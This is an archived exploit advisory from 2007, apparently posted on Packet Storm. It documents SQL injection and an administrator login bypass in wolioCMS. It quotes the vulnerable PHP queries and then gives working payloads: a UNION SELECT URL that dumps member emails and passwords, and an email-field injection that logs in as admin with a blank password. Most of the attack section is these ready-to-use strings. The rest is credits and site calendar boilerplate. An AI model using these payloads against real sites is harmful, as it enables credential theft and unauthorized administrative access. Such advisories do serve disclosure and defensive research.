what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

woliocms-sql.txt

woliocms-sql.txt
Posted Jul 31, 2007
Authored by k1tk4t | Site newhack.org

wolioCMS suffers from a SQL injection and administrative bypass vulnerability.

tags | exploit, sql injection, bypass
SHA-256 | 76994001bb53177f84c17136934aa018600ec94b190431a7390cc844aa11d1c6

woliocms-sql.txt

Change Mirror Download
########################################################################
# wolioCMS - SQL Injection and Bypass Administrator Login
# Vendor : http://www.buton.web.id/member.php?member=anon
# Download : http://www.buton.web.id/download/woliocms.zip
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
########################################################################
Exploit ini berhasil jika 'magic_quotes_gpc = off'
########################################################################
file;
/common.php
bug at line73;
$sql="select * from pages where pages_id='".$_GET["id"]."' ";
----
/admin/index.php
bug at line28;
$sql="select * from member where member_email='$uid' and
member_password='$pwd' and member_active='yes' ";
Variable $uid tidak terfilter dengan baik, sehingga bisa di manipulasi
oleh user
########################################################################
exploit;
SQL Injection
http://localhost/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*
----
Bypass Administrator Login
http://localhost/_woliocms/admin/
Login Page
Email;
'/**/UNION/**/ALL/**/SELECT/**/member_id,member_email,member_password,member_realname,member_urlname,member_themes,member_groups_id,member_register_date,member_active,member_activation_code/**/FROM/**/member/*
Password;
Blank[just kliklogin]
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
y3dips [y3d1ps.blogspot.com]
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[ot]org
-----------------------
all member echo.or.id
-----------------------
tidak lupa untuk anavrin[semangat kerja bro], dan ical yang baru sembuh


--
best regard'

k1tk4t
http://newhack.org
newhack[dot]org@irc.dal.net
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close